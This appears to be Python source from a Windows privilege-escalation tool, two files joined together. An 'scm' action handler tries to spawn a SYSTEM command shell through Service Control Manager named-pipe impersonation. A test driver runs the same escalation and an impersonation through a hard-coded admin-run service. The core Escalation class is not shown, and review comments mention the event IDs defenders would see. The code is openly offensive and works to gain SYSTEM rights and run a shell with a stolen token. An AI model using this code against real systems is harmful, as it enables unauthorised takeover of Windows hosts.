def scm(args):
    """Handle the ``scm`` action: attempt a SYSTEM shell via SCM-based impersonation.

    Nothing happens unless ``args["toSystem"]`` compares equal to ``True``.
    When it does, ``Escalation.namedPipeImpersonationSystemViaSCM`` is called,
    the current thread's effective token is printed, and a command shell is
    started with that token only if the escalation call reported success.

    Args:
        args: Mapping of parsed options; only ``args["toSystem"]`` is read here.

    Returns:
        None in every case; the outcome is only visible through the printed
        output.

    NOTE(review): the helper's implementation is not visible in this listing.
    If it registers a temporary service through the Service Control Manager,
    as its name suggests, the activity should surface in service-installation
    telemetry (System log event 7045, Security log event 4697) and in
    named-pipe creation logging. Confirm against the Escalation class.
    """
    system_requested = args["toSystem"] == True
    if not system_requested:
        return

    printT("Try to spawn a system shell via scm & impersonation...")
    escalation = Escalation()
    impersonator = Impersonate()
    succeeded = escalation.namedPipeImpersonationSystemViaSCM(ps=True, debug=False)
    # Printed whether or not the escalation worked, so the operator can see
    # which token the thread ended up with.
    impersonator.printCurrentThreadEffectiveToken()
    if succeeded == True:
        # A fresh Impersonate instance is created before spawning the shell,
        # exactly as the original listing does.
        impersonator = Impersonate()
        impersonator.executeCMDWithThreadEffectiveToken()
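# -*- coding: UTF-8 -*-
# By Quentin HARDY ([email protected]) - bobsecq
#
# Manual test driver for the Escalation class. It runs three steps in order:
# it prints the candidate services, attempts the SCM-based named-pipe
# impersonation, then attempts the same through one specific service.
import os
import sys

# Anchor the project root to this file's location instead of the process's
# current working directory. With a bare '../' the modules imported below are
# resolved relative to wherever the script is launched from, so a run from
# another directory either fails or loads a different `utils`/`escalation`
# into a process that is typically started with elevated rights.
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from utils import *

configureLogging()
from escalation import Escalation

esc = Escalation()
esc.printCandidatesServices()
esc.namedPipeImpersonationSystemViaSCM(ps=True, debug=False)
# NOTE(review): the service name is a hard-coded, environment-specific value,
# presumably a lab fixture running under a domain admin account. Confirm
# before reusing this driver on another host.
esc.namedPipeImpersonationViaAService("serviceWithDomainUserAdmin")
#esc.namedPipeImpersonationViaAService("BcastDVRUserService_89401")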